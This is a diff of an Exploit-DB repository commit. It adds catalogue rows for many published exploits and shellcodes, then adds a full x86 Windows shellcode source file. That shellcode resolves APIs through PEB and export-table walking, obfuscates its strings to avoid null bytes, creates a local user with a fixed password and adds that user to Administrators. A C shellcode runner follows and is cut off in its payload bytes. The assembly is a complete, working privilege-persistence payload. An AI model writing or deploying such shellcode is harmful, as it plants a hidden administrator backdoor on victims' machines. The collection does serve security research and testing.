38204,exploits/php/webapps/38204.txt,"Prizm Content Connect - Arbitrary File Upload",2013-01-09,"Include Security Research",webapps,php,,2013-01-09,2015-09-15,1,CVE-2012-5190;OSVDB-89114,,,,,https://www.securityfocus.com/bid/57242/info
51185,exploits/php/webapps/51185.txt,"Prizm Content Connect v10.5.1030.8315 - XXE",2023-04-01,xhzeem,webapps,php,,2023-04-01,2023-04-03,0,,,,,,
7409,exploits/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,webapps,php,,2008-12-09,,1,OSVDB-50697;CVE-2008-6502;OSVDB-50696;CVE-2008-6501,,,,,
6612,exploits/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,webapps,php,,2008-09-27,2016-12-23,1,OSVDB-48609;CVE-2008-5070;OSVDB-48608,,,,,
34275,exploits/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",webapps,php,80,2014-08-09,2014-08-09,0,OSVDB-109831;OSVDB-109830;OSVDB-109829;OSVDB-109828;OSVDB-109827;CVE-2014-5276;CVE-2014-5275,,,,,
@ -29356,6 +29380,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
39964,exploits/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comSlimCMS-0.1.tar.gz,
7121,exploits/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,webapps,php,,2008-11-13,2017-01-02,1,OSVDB-50703;CVE-2008-5491,,,,http://www.exploit-db.comSlimCMS-1.0.0.tgz,
6729,exploits/php/webapps/6729.php,"SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation",2008-10-10,StAkeR,webapps,php,,2008-10-09,2017-01-02,1,OSVDB-51113;CVE-2008-5708,,,,http://www.exploit-db.comSlimCMS-1.0.0.tgz,
51211,exploits/php/webapps/51211.txt,"SLIMSV 9.5.2 - Cross-Site Scripting (XSS)",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
12849,exploits/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,webapps,php,,2010-06-02,,0,,,,,,
12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",webapps,php,,2010-05-04,,0,OSVDB-65053,,,,http://www.exploit-db.comslooze-0.2.7.zip,
2317,exploits/php/webapps/2317.txt,"SL_Site 1.0 - 'spaw_root' Remote File Inclusion",2006-09-07,Kw3[R]Ln,webapps,php,,2006-09-06,,1,OSVDB-30797;CVE-2006-5291;CVE-2006-4656,,,,,
@ -33490,6 +33515,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-04-03,0,CVE-2020-25213,,,,,
51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@ -34192,6 +34218,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25519,exploits/php/webapps/25519.txt,"ZPanel - 'templateparser.class.php' Crafted Template Remote Command Execution",2013-04-16,"Sven Slootweg",webapps,php,,2013-05-17,2013-05-17,0,CVE-2013-2097;OSVDB-92531,,,,,
881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,,2005-03-14,,1,OSVDB-14803;CVE-2005-0792,,,,,
996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,webapps,php,,2005-05-16,,1,,,,,,
51207,exploits/php/webapps/51207.txt,"Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,webapps,php,,2009-04-28,,1,OSVDB-55259,,,,,
37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,webapps,php,,2012-03-25,2015-05-14,1,,,,,,https://www.securityfocus.com/bid/52720/info
33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,webapps,php,80,2014-07-02,2014-07-09,0,OSVDB-108669,,,,http://www.exploit-db.comzurmo-stable-2.6.3.faaf3b4c8596.zip,
@ -34251,6 +34278,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31125,,,,,
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31126,,,,,
51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",2021-09-22,"Mohin Paramasivam",webapps,python,,2021-09-22,2021-09-22,0,,,,,,
47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,,2019-09-30,2019-09-30,0,,,,,http://www.exploit-db.comthesystem-master.zip,
47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,,2019-09-30,2019-09-30,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comthesystem-master.zip,
@ -34386,6 +34416,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2641,exploits/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",local,solaris,,2006-10-23,2016-11-14,1,CVE-2006-4842,,,,,
2543,exploits/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",local,solaris,,2006-10-12,2016-11-14,1,CVE-2006-4842,,,,,
2569,exploits/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",local,solaris,,2006-10-15,2016-11-14,1,CVE-2006-4842,,,,,
51209,exploits/solaris/local/51209.c,"Solaris 10 libXm - Buffer overflow Local privilege escalation",2023-04-03,"Marco Ivaldi",local,solaris,,2023-04-03,2023-04-03,0,,,,,,
20418,exploits/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Privilege Escalation",2012-08-11,"Larry Cashdollar",local,solaris,,2012-08-11,2016-11-12,0,OSVDB-85419;CVE-2010-1183,,,,,https://www.securityfocus.com/bid/54919/info
2241,exploits/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)",2006-08-22,"Marco Ivaldi",local,solaris,,2006-08-21,,1,CVE-2006-3824,,,,,
972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris,,2005-04-29,,1,OSVDB-16058;CVE-2005-1394,,,,,
@ -39222,6 +39253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,,2019-01-17,2019-01-17,1,,Local,,,,http://muffsec.com/blog/?p=401
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,,2019-10-07,2019-10-07,0,CVE-2019-8452,,,,,
2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow",2006-07-23,"Luigi Auriemma",local,windows,,2006-07-22,,1,OSVDB-28466;CVE-2006-3814,,,,,
51210,exploits/windows/local/51210.txt,"Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path",2023-04-03,"Laguin Benjamin",local,windows,,2023-04-03,2023-04-03,0,,,,,,
44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,,2018-03-09,2018-03-09,0,,,,,,https://github.com/649/Chrome-Sandbox-Exploit/tree/e09a4b22a261bf1a941486c5566d861301ceb4de
41321,exploits/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,local,windows,,2017-02-12,2017-02-12,0,,,,,,
41320,exploits/windows/local/41320.txt,"Cimetrics BACstac 6.2f - Local Privilege Escalation",2017-02-12,LiquidWorm,local,windows,,2017-02-12,2017-02-12,0,,,,,,
@ -39677,6 +39709,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10039,exploits/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant",2009-10-23,Dr_IDE,local,windows,,2009-10-22,,1,,,,,,
8612,exploits/windows/local/8612.pl,"Grabit 1.7.2 Beta 3 - '.nzb' Local Buffer Overflow (SEH)",2009-05-05,"Gaurav Baruah",local,windows,,2009-05-04,,1,OSVDB-54205;CVE-2009-1586,,,,,
8637,exploits/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",local,windows,,2009-05-06,,1,CVE-2009-1586;OSVDB-54205,,,,,
51223,exploits/windows/local/51223.py,"Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow",2023-04-03,Knursoft,local,windows,,2023-04-03,2023-04-03,0,,,,,,
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comgraylog-collector-0.4.2.zip,
18748,exploits/windows/local/18748.rb,"GSM SIM Editor 5.15 - Local Buffer Overflow (Metasploit)",2012-04-18,Metasploit,local,windows,,2012-04-18,2012-04-18,1,OSVDB-81161,"Metasploit Framework (MSF)",,,,
14098,exploits/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,local,windows,,2010-06-28,2010-07-03,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14098.png,http://www.exploit-db.commultisim515.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
@ -39706,6 +39739,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50765,exploits/windows/local/50765.txt,"HMA VPN 5.3 - Unquoted Service Path",2022-02-21,"Saud Alenazi",local,windows,,2022-02-21,2022-02-21,0,,,,,,
48068,exploits/windows/local/48068.txt,"HomeGuard Pro 9.3.1 - Insecure Folder Permissions",2020-02-14,boku,local,windows,,2020-02-14,2020-02-14,0,,,,,,
15022,exploits/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",local,windows,,2010-09-16,2010-09-16,1,OSVDB-68093,,,http://www.exploit-db.com/screenshots/idlt15500/15022.png,http://www.exploit-db.comhtvhstodvd30shareeng.exe,
51206,exploits/windows/local/51206.txt,"HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path",2023-04-03,"Wim Jaap van Vliet",local,windows,,2023-04-03,2023-04-03,0,,,,,,
44042,exploits/windows/local/44042.md,"Hotspot Shield - Information Disclosure",2018-01-30,SecuriTeam,local,windows,,2018-02-15,2018-02-15,0,CVE-2018-6460,,,,,https://blogs.securiteam.com/index.php/archives/3604
40528,exploits/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,local,windows,,2016-10-13,2016-10-19,1,,,,,http://www.exploit-db.comHSS-6.0.4-install-plain-773-plain.exe,
29403,exploits/windows/local/29403.txt,"HP (Multiple Products) - PML Driver HPZ12 Privilege Escalation",2007-01-08,Sowhat,local,windows,,2007-01-08,2013-11-03,1,CVE-2007-0161;OSVDB-32654,,,,,https://www.securityfocus.com/bid/21935/info
@ -40037,6 +40071,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18067,exploits/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite (MS11-021)",2011-11-02,Abysssec,local,windows,,2011-11-02,2011-11-02,1,MS11-021,,,,,
40860,exploits/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,0,,,,,,
50868,exploits/windows/local/50868.txt,"Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
16024,exploits/windows/local/16024.txt,"Microsoft Fax - Cover Page Editor 5.2.3790.3959 Double-Free Memory Corruption",2011-01-24,"Luigi Auriemma",local,windows,,2011-01-21,2011-01-24,1,,,,http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-24-at-10602-pm.png,,http://aluigi.org/adv/fxscover_1-adv.txt
43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,local,windows,,2017-10-19,2017-10-19,0,,,,,,
@ -41251,6 +41286,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25131,exploits/windows/local/25131.py,"WinArchiver 3.2 - Local Buffer Overflow (SEH)",2013-05-01,RealPentesting,local,windows,,2013-05-01,2013-05-02,1,OSVDB-92992;CVE-2013-5660,,,,http://www.exploit-db.comWinArchiver3.exe,
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,,2021-01-06,2021-01-06,0,,,,,,
11779,exploits/windows/local/11779.pl,"Windisc 1.3 - Local Stack Buffer Overflow",2010-03-16,Rick2600,local,windows,,2010-03-15,2010-11-12,1,OSVDB-63026,,,,http://www.exploit-db.comwindiscz.exe,
51203,exploits/windows/local/51203.txt,"Windows 11 10.0.22000 - Backup service Privilege Escalation",2023-04-03,nu11secur1ty,local,windows,,2023-04-03,2023-04-03,0,,,,,,
50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",2021-11-12,"Marcio Mendes",local,windows,,2021-11-12,2021-11-12,0,,,,,,
48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,,2020-09-16,2020-09-16,0,,,,,,
48021,exploits/windows/local/48021.rb,"Windscribe - WindscribeService Named Pipe Privilege Escalation (Metasploit)",2020-02-07,Metasploit,local,windows,,2020-02-07,2020-02-07,1,CVE-2018-11479,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -989,6 +989,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
43767,shellcodes/windows_x86/43767.asm,"Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes)",2009-01-01,Skylined,,windows_x86,100,2018-01-18,2018-01-18,0,,"Metasploit Framework (MSF)",,,,http://shell-storm.org/shellcode/files/shellcode-701.php
13521,shellcodes/windows_x86/13521.asm,"Windows/x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,,windows_x86,104,2006-01-23,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-391.php
43761,shellcodes/windows_x86/43761.asm,"Windows/x86 - Create Administrator User (X) Shellcode (304 bytes)",2009-01-01,"H D Moore",,windows_x86,304,2018-01-18,2018-01-18,0,,"Metasploit Framework (MSF)",,,,http://shell-storm.org/shellcode/files/shellcode-175.php
51208,shellcodes/windows_x86/51208.asm,"Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)",2023-04-03,"Xavi Beltran",,windows_x86,373,2023-04-03,2023-04-03,0,,,,,,
40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",,windows_x86,253,2016-08-16,2016-08-16,0,,,,,,
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",,windows_x86,96,2016-03-02,2017-08-24,0,,,,,,
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",,windows_x86,143,2021-01-22,2021-10-29,0,,,,,,

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
989 43767 shellcodes/windows_x86/43767.asm Windows/x86 - calc.exe + Null-Free Shellcode (100 bytes) 2009-01-01 Skylined windows_x86 100 2018-01-18 2018-01-18 0 Metasploit Framework (MSF) http://shell-storm.org/shellcode/files/shellcode-701.php
990 13521 shellcodes/windows_x86/13521.asm Windows/x86 - Command WinExec() Shellcode (104+ bytes) 2006-01-24 Weiss windows_x86 104 2006-01-23 2018-01-09 1 http://shell-storm.org/shellcode/files/shellcode-391.php
991 43761 shellcodes/windows_x86/43761.asm Windows/x86 - Create Administrator User (X) Shellcode (304 bytes) 2009-01-01 H D Moore windows_x86 304 2018-01-18 2018-01-18 0 Metasploit Framework (MSF) http://shell-storm.org/shellcode/files/shellcode-175.php
992 51208 shellcodes/windows_x86/51208.asm Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes) 2023-04-03 Xavi Beltran windows_x86 373 2023-04-03 2023-04-03 0
993 40246 shellcodes/windows_x86/40246.c Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat windows_x86 253 2016-08-16 2016-08-16 0
994 39519 shellcodes/windows_x86/39519.c Windows/x86 - Download File (//192.168.1.19/c) Via WebDAV + Execute Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon windows_x86 96 2016-03-02 2017-08-24 0
995 49466 shellcodes/windows_x86/49466.asm Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) 2021-01-22 Armando Huesca Prida windows_x86 143 2021-01-22 2021-10-29 0

308
shellcodes/windows_x86/51208.asm Normal file
View file

@ -0,0 +1,308 @@
; Title: Name: Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
; Author: Xavi Beltran
; Contact: xavibeltran@protonmail.com
; Website: https://xavibel.com/2023/01/18/shellcode-windows-x86-create-administrator-user-dynamic-peb-edt/
; Date: 18/01/2022
; Tested on: Microsoft Windows Version 10.0.19045
; Description:
; This is a shellcode that creates a new user named "xavi" with password "Summer12345!". Then adds this user to administrators group.
; In order to accomplish this task the shellcode uses the PEB method to locate the baseAddress of the modules and then Export Directory Table to locate the symbols.
; The shellcodes perform 3 different calls:
; - NetUserAdd
; - NetLocalGroupAddMembers
; - ExitProcess
####################################### adduser.asm #######################################
start:
mov ebp, esp ;
add esp, 0xfffff9f0 ; To avoid null bytes
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi,fs:[ecx+30h] ; ESI = &(PEB) ([FS:0x30])
mov esi,[esi+0Ch] ; ESI = PEB->Ldr
mov esi,[esi+1Ch] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+8h] ; EBX = InInitOrder[X].base_address
mov edi, [esi+20h] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00?
jne next_module ; No: try next module.
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; POP the return address from the stack
mov [ebp+0x04], esi ; Save find_function address for later usage
jmp resolve_symbols_kernel32 ;
find_function_shorten_bnc: ;
call find_function_ret ; Relative CALL with negative offset
find_function:
pushad ; Save all registers
mov eax, [ebx+0x3c] ; Offset to PE Signature
mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
mov ecx, [edi+0x18] ; NumberOfNames
mov eax, [edi+0x20] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA for later use
find_function_loop:
jecxz find_function_finished ; Jump to the end if ECX is 0
dec ecx ; Decrement our names counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
add esi, ebx ; Set ESI to the VMA of the current symbol name
compute_hash:
xor eax, eax ;
cdq ; Null EDX
cld ; Clear direction
compute_hash_again:
lodsb ; Load the next byte from esi into al
test al, al ; Check for NULL terminator
jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
ror edx, 0x0d ; Rotate edx 13 bits to the right
add edx, eax ; Add the new byte to the accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
find_function_compare:
cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
jnz find_function_loop ; If it doesn't match go back to find_function_loop
mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
mov edx, [edi+0x1c] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get the function RVA
add eax, ebx ; Get the function VMA
mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
find_function_finished:
popad ; Restore registers
ret ;
; Resolve kernel32 symbols
resolve_symbols_kernel32:
push 0x78b5b983 ; Kernel 32 - TerminateProcess hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
push 0xec0e4e8e ; Kernel 32 - LoadLibraryA hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
; LoadLibraryA - samcli.dll
load_samcli:
xor eax, eax ;
push eax ;
mov ax, 0x6c6c ; # ll
push eax ;
push 0x642e696c ; d.il
push 0x636d6173 ; cmas
push esp ; Push ESP to have a pointer to the string
call dword [ebp+0x14] ; Call LoadLibraryA
; Resolve samcli.dll symbols
resolve_symbols_samcli:
; Samcli - NetUserAdd
mov ebx, eax ; Move the base address of samcli.dll to EBX
push 0xcd7cdf5e ; NetUserAdd hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x1C], eax ; Save NetUserAdd address for later usage
; Samcli - NetLocalGroupAddMembers
push 0xc30c3dd7 ; NetLocalGroupAddMembers hash
call dword [ebp+0x04] ; Call find_function
mov [ebp+0x20], eax ; Save NetLocalGroupAddMembers address for later usage
execute_shellcode:
; Useful registers
xor eax, eax ; eax = 0
xor ebx, ebx ;
inc ebx ; ebx = 1
; Group - Administrators
push eax ; string delimiter
; push 0x00730072 ; sr
mov edx, 0xff8cff8e ;
neg edx ;
push edx ;
; push 0x006f0074 ; ot
mov edx, 0xff90ff8c ;
neg edx ;
push edx ;
; push 0x00610072 ; ar
mov edx, 0xff9eff8e ;
neg edx ;
push edx ;
; push 0x00740073 ; ts
mov edx, 0xff8bff8d ;
neg edx ;
push edx ;
; push 0x0069006e ; in
mov edx, 0xff96ff92 ;
neg edx ;
push edx ;
; push 0x0069006d ; im
mov edx, 0xff96ff93 ;
neg edx ;
push edx ;
; push 0x00640041 ; dA
mov edx, 0xff9bffbf ;
neg edx ;
push edx ;
mov [ebp+0x24], esp ; store groupname in [esi]
; Username - xavi
push eax ; string delimiter
; push 0x00690076 ; iv
mov edx, 0xff96ff8a ;
neg edx ;
push edx ;
; push 0x00610078 ; xa
mov edx, 0xff9eff88 ;
neg edx ;
push edx ;
mov ecx, esp ; Pointer to the string
mov [ebp+0x28], ecx ; store username in [esi+4]
; Password - Summer12345!
push eax ; string delimiter
; push 0x00210035 ; !5
mov edx, 0xffdeffcb ;
neg edx ;
push edx ;
; push 0x00340033 ; 43
mov edx, 0xffcbffcd ;
neg edx ;
push edx ;
; push 0x00320031 ; 21
mov edx, 0xffcdffcf ;
neg edx ;
push edx ;
; push 0x00720065 ; re
mov edx, 0xff8dff9b ;
neg edx ;
push edx ;
; push 0x006d006d ; mm
mov edx, 0xff92ff93 ;
neg edx ;
push edx ;
; push 0x00750053 ; uS
mov edx, 0xff8affad ;
neg edx ;
push edx ;
mov edx, esp ; store password in edx
; USER_INFO_1 structure
push eax ; 0 - sScript_Path
push ebx ; 1 - uiFlags
push eax ; 0 - sComment
push eax ; 0 - sHome_Dir
push ebx ; 1 - uiPriv = USER_PRIV_USER = 1
push eax ; 0 - uiPasswordAge
push edx ; str - sPassword
push ecx ; str - sUsername
mov ecx, esp ;
; NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, UInt32 level, IntPtr userInfo, out UInt32 parm_err);
; NetUserAdd(null, 1, bufptr, out parm_err);
push eax ; 0 - parm_err
push esp ; pointer to USER_INFO_1 structure ?
push ecx ; USER_INFO_1 - UserInfo
push ebx ; 1 - level
push eax ; 0 - servername
call dword [ebp+0x1C] ; NetUserAdd - System Call
; LOCALGROUP_MEMBERS_INFO_3 structure
mov ecx, [ebp+0x28] ; Domain = Username
push ecx ;
mov ecx, esp ; Save a pointer to Username
; NetLocalGroupAddMembers(string servername, string groupname, UInt32 level, ref LOCALGROUP_MEMBERS_INFO_3 buf, UInt32 totalentries);
; NetLocalGroupAddMembers(null, "administrators", 3, ref group, 1);
push ebx ; 1 - totalentries
push ecx ; LOCALGROUP_MEMBERS_INFO_3 - username
push 3 ; 3 - level 3 means that we are using the structure LOCALGROUP_MEMBERS_INFO_3
push dword [ebp+0x24] ; str - groupname
push eax ; 0 - servername
call dword [ebp+0x20] ; NetLocalGroupAddMembers - System Call
xor eax, eax ;
push eax ; return 0
call dword [ebp+0x10] ; ExitProcess - System Call
####################################### shellcode.c #######################################
/*
Shellcode runner author: reenz0h (twitter: @sektor7net)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char payload[] =
"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c"
